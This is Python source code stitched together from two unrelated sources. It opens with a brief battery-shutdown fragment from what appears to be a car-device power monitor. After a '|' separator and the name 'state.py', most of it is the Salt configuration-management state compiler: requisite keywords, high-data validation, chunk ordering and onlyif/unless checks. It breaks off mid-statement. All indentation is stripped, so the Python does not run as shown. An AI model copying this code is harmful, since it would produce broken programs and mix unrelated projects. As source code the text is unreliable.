panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen
return should_shutdown
|
state.py
|
"""
The State Compiler is used to execute states in Salt. A state is unlike
an execution module in that instead of just executing a command, it
ensures that a certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
'name': '<the name argument passed to all states>'
'argn': '<arbitrary argument, can have many of these>'
}
"""
import copy
import datetime
import fnmatch
import logging
import os
import random
import re
import site
import sys
import time
import traceback
import salt.fileclient
import salt.loader
import salt.minion
import salt.pillar
import salt.syspaths as syspaths
import salt.transport.client
import salt.utils.args
import salt.utils.crypt
import salt.utils.data
import salt.utils.decorators.state
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.url
# Explicit late import to avoid circular import. DO NOT MOVE THIS.
import salt.utils.yamlloader as yamlloader
from salt.exceptions import CommandExecutionError, SaltRenderError, SaltReqTimeoutError
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext.six.moves import map, range, reload_module
from salt.serializers.msgpack import deserialize as msgpack_deserialize
from salt.serializers.msgpack import serialize as msgpack_serialize
from salt.template import compile_template, compile_template_str
from salt.utils.odict import DefaultOrderedDict, OrderedDict
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are to be used
# by salt in this state module and not on the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset(
[
"onchanges",
"onchanges_any",
"onfail",
"onfail_any",
"onfail_all",
"onfail_stop",
"prereq",
"prerequired",
"watch",
"watch_any",
"require",
"require_any",
"listen",
]
)
STATE_REQUISITE_IN_KEYWORDS = frozenset(
["onchanges_in", "onfail_in", "prereq_in", "watch_in", "require_in", "listen_in"]
)
STATE_RUNTIME_KEYWORDS = frozenset(
[
"fun",
"state",
"check_cmd",
"failhard",
"onlyif",
"unless",
"creates",
"retry",
"order",
"parallel",
"prereq",
"prereq_in",
"prerequired",
"reload_modules",
"reload_grains",
"reload_pillar",
"runas",
"runas_password",
"fire_event",
"saltenv",
"use",
"use_in",
"__env__",
"__sls__",
"__id__",
"__orchestration_jid__",
"__pub_user",
"__pub_arg",
"__pub_jid",
"__pub_fun",
"__pub_tgt",
"__pub_ret",
"__pub_pid",
"__pub_tgt_type",
"__prereq__",
"__prerequired__",
]
)
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(
STATE_REQUISITE_IN_KEYWORDS
).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
"""
Take a low tag and split it back into the low dict that it came from
"""
state, id_, name, fun = tag.split("_|-")
return {"state": state, "__id__": id_, "name": name, "fun": fun}
def _gen_tag(low):
"""
Generate the running dict tag string from the low data structure
"""
return "{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}".format(low)
def _clean_tag(tag):
"""
Make tag name safe for filenames
"""
return salt.utils.files.safe_filename_leaf(tag)
def _l_tag(name, id_):
low = {
"name": "listen_{}".format(name),
"__id__": "listen_{}".format(id_),
"state": "Listen_Error",
"fun": "Listen_Error",
}
return _gen_tag(low)
def _calculate_fake_duration():
"""
Generate a NULL duration for when states do not run
but we want the results to be consistent.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
utc_finish_time = datetime.datetime.utcnow()
start_time = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
return start_time, duration
def get_accumulator_dir(cachedir):
"""
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
"""
fn_ = os.path.join(cachedir, "accumulator")
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def trim_req(req):
"""
Trim any function off of a requisite
"""
reqfirst = next(iter(req))
if "." in reqfirst:
return {reqfirst.split(".")[0]: req[reqfirst]}
return req
def state_args(id_, state, high):
"""
Return a set of the arguments passed to the named state
"""
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
"""
Scan high data for the id referencing the given name and return a list of (IDs, state) tuples that match
Note: if `state` is sls, then we are looking for all IDs that match the given SLS
"""
ext_id = []
if name in high:
ext_id.append((name, state))
# if we are requiring an entire SLS, then we need to add ourselves to everything in that SLS
elif state == "sls":
for nid, item in high.items():
if item["__sls__"] == name:
ext_id.append((nid, next(iter(item))))
# otherwise we are requiring a single state, lets find it
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(high[nid][state], list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id.append((nid, state))
return ext_id
def find_sls_ids(sls, high):
"""
Scan for all ids in the given sls and return them in a dict; {name: state}
"""
ret = []
for nid, item in high.items():
try:
sls_tgt = item["__sls__"]
except TypeError:
if nid != "__exclude__":
log.error(
"Invalid non-dict item '%s' in high data. Value: %r", nid, item
)
continue
else:
if sls_tgt == sls:
for st_ in item:
if st_.startswith("__"):
continue
ret.append((nid, st_))
return ret
def format_log(ret):
"""
Format the state into a log message
"""
msg = ""
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if "changes" in ret:
# Yep, looks like a valid state return
chg = ret["changes"]
if not chg:
if ret["comment"]:
msg = ret["comment"]
else:
msg = "No changes made for {0[name]}".format(ret)
elif isinstance(chg, dict):
if "diff" in chg:
if isinstance(chg["diff"], str):
msg = "File changed:\n{}".format(chg["diff"])
if all([isinstance(x, dict) for x in chg.values()]):
if all([("old" in x and "new" in x) for x in chg.values()]):
msg = "Made the following changes:\n"
for pkg in chg:
old = chg[pkg]["old"]
if not old and old not in (False, None):
old = "absent"
new = chg[pkg]["new"]
if not new and new not in (False, None):
new = "absent"
# This must be able to handle unicode as some package names contain
# non-ascii characters like "Français" or "Español". See Issue #33605.
msg += "'{}' changed from '{}' to '{}'\n".format(
pkg, old, new
)
if not msg:
msg = str(ret["changes"])
if ret["result"] is True or ret["result"] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(str(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
"""
Compile the master side low state data, and build the hidden state file
"""
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
def mock_ret(cdata):
"""
Returns a mocked return dict with information about the run, without
executing the state function
"""
# As this is expanded it should be sent into the execution module
# layer or it should be turned into a standalone loader system
if cdata["args"]:
name = cdata["args"][0]
else:
name = cdata["kwargs"]["name"]
return {
"name": name,
"comment": "Not called, mocked",
"changes": {},
"result": True,
}
class StateError(Exception):
"""
Custom exception class.
"""
class Compiler:
"""
Class used to compile and manage the High Data structure
"""
def __init__(self, opts, renderers):
self.opts = opts
self.rend = renderers
def render_template(self, template, **kwargs):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
**kwargs
)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
"""
Turns dot delimited function refs into function strings
"""
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
# Is this is a short state? It needs to be padded!
if "." in high[name]:
comps = high[name].split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
if name.startswith("__"):
continue
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}".format(name, body["__sls__"], type(name).__name__)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
(
"The {}"
" statement in state '{}' in SLS '{}' "
"needs to be formed as a list"
).format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {"state": state}
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"is SLS {}\n"
).format(
str(req_val), body["__sls__"],
)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
(
"Multiple dictionaries "
"defined in argument of state '{}' in SLS"
" '{}'"
).format(name, body["__sls__"])
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
(
"No function declared in state '{}' in" " SLS '{}'"
).format(state, body["__sls__"])
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunk["name"] = salt.utils.data.decode(chunk["name"])
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order = name_order + 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associtaed ids
for name, body in high.items():
if name.startswith("__"):
continue
if body.get("__sls__", "") in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
class State:
"""
Class used to execute salt states
"""
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.states_loader = loader
if "grains" not in opts:
opts["grains"] = salt.loader.grains(opts)
self.opts = opts
self.proxy = proxy
self._pillar_override = pillar_override
if pillar_enc is not None:
try:
pillar_enc = pillar_enc.lower()
except AttributeError:
pillar_enc = str(pillar_enc).lower()
self._pillar_enc = pillar_enc
log.debug("Gathering pillar data for state run")
if initial_pillar and not self._pillar_override:
self.opts["pillar"] = initial_pillar
else:
# Compile pillar data
self.opts["pillar"] = self._gather_pillar()
# Reapply overrides on top of compiled pillar
if self._pillar_override:
self.opts["pillar"] = salt.utils.dictupdate.merge(
self.opts["pillar"],
self._pillar_override,
self.opts.get("pillar_source_merging_strategy", "smart"),
self.opts.get("renderer", "yaml"),
self.opts.get("pillar_merge_lists", False),
)
log.debug("Finished gathering pillar data for state run")
self.state_con = context or {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = str(id(self))
self.inject_globals = {}
self.mocked = mocked
def _gather_pillar(self):
"""
Whenever a state run starts, gather the pillar data fresh
"""
if self._pillar_override:
if self._pillar_enc:
try:
self._pillar_override = salt.utils.crypt.decrypt(
self._pillar_override,
self._pillar_enc,
translate_newlines=True,
renderers=getattr(self, "rend", None),
opts=self.opts,
valid_rend=self.opts["decrypt_pillar_renderers"],
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to decrypt pillar override: %s", exc)
if isinstance(self._pillar_override, str):
# This can happen if an entire pillar dictionary was passed as
# a single encrypted string. The override will have been
# decrypted above, and should now be a stringified dictionary.
# Use the YAML loader to convert that to a Python dictionary.
try:
self._pillar_override = yamlloader.load(
self._pillar_override, Loader=yamlloader.SaltYamlSafeLoader
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to load CLI pillar override")
log.exception(exc)
if not isinstance(self._pillar_override, dict):
log.error("Pillar override was not passed as a dictionary")
self._pillar_override = None
pillar = salt.pillar.get_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
self.opts["saltenv"],
pillar_override=self._pillar_override,
pillarenv=self.opts.get("pillarenv"),
)
return pillar.compile_pillar()
def _mod_init(self, low):
"""
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
"""
# ensure that the module is loaded
try:
self.states[
"{}.{}".format(low["state"], low["fun"])
] # pylint: disable=W0106
except KeyError:
return
minit = "{}.mod_init".format(low["state"])
if low["state"] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low["state"])
def _mod_aggregate(self, low, running, chunks):
"""
Execute the aggregation systems to runtime modify the low chunk
"""
agg_opt = self.functions["config.option"]("state_aggregate")
if "aggregate" in low:
agg_opt = low["aggregate"]
if agg_opt is True:
agg_opt = [low["state"]]
elif not isinstance(agg_opt, list):
return low
if low["state"] in agg_opt and not low.get("__agg__"):
agg_fun = "{}.mod_aggregate".format(low["state"])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low["__agg__"] = True
except TypeError:
log.error("Failed to execute aggregate for state %s", low["state"])
return low
def _run_check(self, low_data):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False, "comment": []}
cmd_opts = {}
# Set arguments from cmd.run state as appropriate
POSSIBLE_CMD_ARGS = (
"cwd",
"root",
"runas",
"env",
"prepend_path",
"umask",
"timeout",
"success_retcodes",
)
for run_cmd_arg in POSSIBLE_CMD_ARGS:
cmd_opts[run_cmd_arg] = low_data.get(run_cmd_arg)
if "shell" in low_data:
cmd_opts["shell"] = low_data["shell"]
elif "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
if "onlyif" in low_data:
_ret = self._run_check_onlyif(low_data, cmd_opts)
ret["result"] = _ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
ret["skip_watch"] = _ret["skip_watch"]
if "unless" in low_data:
_ret = self._run_check_unless(low_data, cmd_opts)
# If either result is True, the returned result should be True
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
if "creates" in low_data:
_ret = self._run_check_creates(low_data)
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
return ret
def _run_check_function(self, entry):
"""Format slot args and run unless/onlyif function."""
fun = entry.pop("fun")
args = entry.pop("args") if "args" in entry else []
cdata = {"args": args, "kwargs": entry}
self.format_slots(cdata)
return self.functions[fun](*cdata["args"], **cdata["kwargs"])
def _run_check_onlyif(self, low_data, cmd_opts):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False}
if not isinstance(low_data["onlyif"], list):
low_data_onlyif = [low_data["onlyif"]]
else:
low_data_onlyif = low_data["onlyif"]
def _check_cmd(cmd):
if cmd != 0 and ret["result"] is False:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
elif cmd == 0:
ret.update({"comment": "onlyif condition is true", "result": False})
for entry in low_data_onlyif:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
except CommandExecutionError:
# Command failed, notify onlyif to skip running the item
cmd = 100
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in onlyif: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif not result:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
else:
ret.update({"comment": "onlyif condition is true", "result": False})
else:
ret.update(
{
"comment": "onlyif execution failed, bad type passed",
"result": False,
}
)
return ret
def _run_check_unless(self, low_data, cmd_opts):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False}
if not isinstance(low_data["unless"], list):
low_data_unless = [low_data["unless"]]
else:
low_data_unless = low_data["unless"]
def _check_cmd(cmd):
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
elif cmd != 0:
ret.update({"comment": "unless condition is false", "result": False})
for entry in low_data_unless:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
except CommandExecutionError:
# Command failed, so notify unless to skip the item
cmd = 0
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in unless: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif result:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
else:
ret.update(
{"comment": "unless condition is false", "result": False}
)
else:
ret.update(
{
"comment": "unless condition is false, bad type passed",
"result": False,
}
)
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
"""
Alter the way a successful state run is determined
"""
ret = {"result": False}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
for entry in low_data["check_cmd"]:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "check_cmd determined the state succeeded",
"result": True,
}
)
elif cmd != 0:
ret.update(
{
"comment": "check_cmd determined the state failed",
"result": False,
}
)
return ret
return ret
def _run_check_creates(self, low_data):
"""
Check that listed files exist
"""
ret = {"result": False}
if isinstance(low_data["creates"], str) and os.path.exists(low_data["creates"]):
ret["comment"] = "{} exists".format(low_data["creates"])
ret["result"] = True
ret["skip_watch"] = True
elif isinstance(low_data["creates"], list) and all(
[os.path.exists(path) for path in low_data["creates"]]
):
ret["comment"] = "All files in creates exist"
ret["result"] = True
ret["skip_watch"] = True
else:
ret["comment"] = "Creates files not found"
ret["result"] = False
return ret
def reset_run_num(self):
"""
Rest the run_num value to 0
"""
self.__run_num = 0
def _load_states(self):
"""
Read the state loader value and loadup the correct states subsystem
"""
if self.states_loader == "thorium":
self.states = salt.loader.thorium(
self.opts, self.functions, {}
) # TODO: Add runners, proxy?
else:
self.states = salt.loader.states(
self.opts,
self.functions,
self.utils,
self.serializers,
context=self.state_con,
proxy=self.proxy,
)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts, self.state_con, utils=self.utils, proxy=self.proxy
)
if isinstance(data, dict):
if data.get("provider", False):
if isinstance(data["provider"], str):
providers = [{data["state"]: data["provider"]}]
elif isinstance(data["provider"], list):
providers = data["provider"]
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(
self.opts, provider[mod], self.functions
)
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
self.functions[f_key] = funcs[func]
self.serializers = salt.loader.serializers(self.opts)
self._load_states()
self.rend = salt.loader.render(
self.opts,
self.functions,
states=self.states,
proxy=self.proxy,
context=self.state_con,
)
def module_refresh(self):
"""
Refresh all the modules
"""
log.debug("Refreshing modules...")
if self.opts["grains"].get("os") != "MacOS":
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
try:
reload_module(site)
except RuntimeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
except TypeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
self.load_modules()
if not self.opts.get("local", False) and self.opts.get("multiprocessing", True):
self.functions["saltutil.refresh_modules"]()
def check_refresh(self, data, ret):
"""
Check to see if the modules for this state instance need to be updated,
only update if the state is a file or a package and if it changed
something. If the file function is managed check to see if the file is a
possible module type, e.g. a python, pyx, or .so. Always refresh if the
function is recurse, since that can lay down anything.
"""
_reload_modules = False
if data.get("reload_grains", False):
log.debug("Refreshing grains...")
self.opts["grains"] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get("reload_pillar", False):
log.debug("Refreshing pillar...")
self.opts["pillar"] = self._gather_pillar()
_reload_modules = True
if not ret["changes"]:
if data.get("force_reload_modules", False):
self.module_refresh()
return
if data.get("reload_modules", False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if data["state"] == "file":
if data["fun"] == "managed":
if data["name"].endswith((".py", ".pyx", ".pyo", ".pyc", ".so")):
self.module_refresh()
elif data["fun"] == "recurse":
self.module_refresh()
elif data["fun"] == "symlink":
if "bin" in data["name"]:
self.module_refresh()
elif data["state"] in ("pkg", "ports", "pip"):
self.module_refresh()
def verify_data(self, data):
"""
Verify the data, return an error statement if something is wrong
"""
errors = []
if "state" not in data:
errors.append('Missing "state" data')
if "fun" not in data:
errors.append('Missing "fun" data')
if "name" not in data:
errors.append('Missing "name" data')
if data["name"] and not isinstance(data["name"], str):
errors.append(
"ID '{}' {}is not formed as a string, but is a {}".format(
data["name"],
"in SLS '{}' ".format(data["__sls__"]) if "__sls__" in data else "",
type(data["name"]).__name__,
)
)
if errors:
return errors
full = data["state"] + "." + data["fun"]
if full not in self.states:
if "__sls__" in data:
errors.append(
"State '{}' was not found in SLS '{}'".format(full, data["__sls__"])
)
reason = self.states.missing_fun_string(full)
if reason:
errors.append("Reason: {}".format(reason))
else:
errors.append("Specified state '{}' was not found".format(full))
else:
# First verify that the parameters are met
aspec = salt.utils.args.get_function_argspec(self.states[full])
arglen = 0
deflen = 0
if isinstance(aspec.args, list):
arglen = len(aspec.args)
if isinstance(aspec.defaults, tuple):
deflen = len(aspec.defaults)
for ind in range(arglen - deflen):
if aspec.args[ind] not in data:
errors.append(
"Missing parameter {} for state {}".format(
aspec.args[ind], full
)
)
# If this chunk has a recursive require, then it will cause a
# recursive loop when executing, check for it
reqdec = ""
if "require" in data:
reqdec = "require"
if "watch" in data:
# Check to see if the service has a mod_watch function, if it does
# not, then just require
# to just require extend the require statement with the contents
# of watch so that the mod_watch function is not called and the
# requisite capability is still used
if "{}.mod_watch".format(data["state"]) not in self.states:
if "require" in data:
data["require"].extend(data.pop("watch"))
else:
data["require"] = data.pop("watch")
reqdec = "require"
else:
reqdec = "watch"
if reqdec:
for req in data[reqdec]:
reqfirst = next(iter(req))
if data["state"] == reqfirst:
if fnmatch.fnmatch(data["name"], req[reqfirst]) or fnmatch.fnmatch(
data["__id__"], req[reqfirst]
):
err = (
"Recursive require detected in SLS {} for"
" require {} in ID {}"
).format(data["__sls__"], req, data["__id__"])
errors.append(err)
return errors
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
try:
if name.startswith("__"):
continue
except AttributeError:
pass
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}. It may need to be quoted.".format(
name, body["__sls__"], type(name).__name__
)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if body[state] is None:
errors.append(
"ID '{}' in SLS '{}' contains a short declaration "
"({}) with a trailing colon. When not passing any "
"arguments to a state, the colon must be omitted.".format(
name, body["__sls__"], state
)
)
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst == "names":
if not isinstance(arg[argfirst], list):
errors.append(
"The 'names' argument in state "
"'{}' in SLS '{}' needs to be "
"formed as a list".format(name, body["__sls__"])
)
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
"The {} statement in state '{}' in "
"SLS '{}' needs to be formed as a "
"list".format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = OrderedDict(state=state)
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
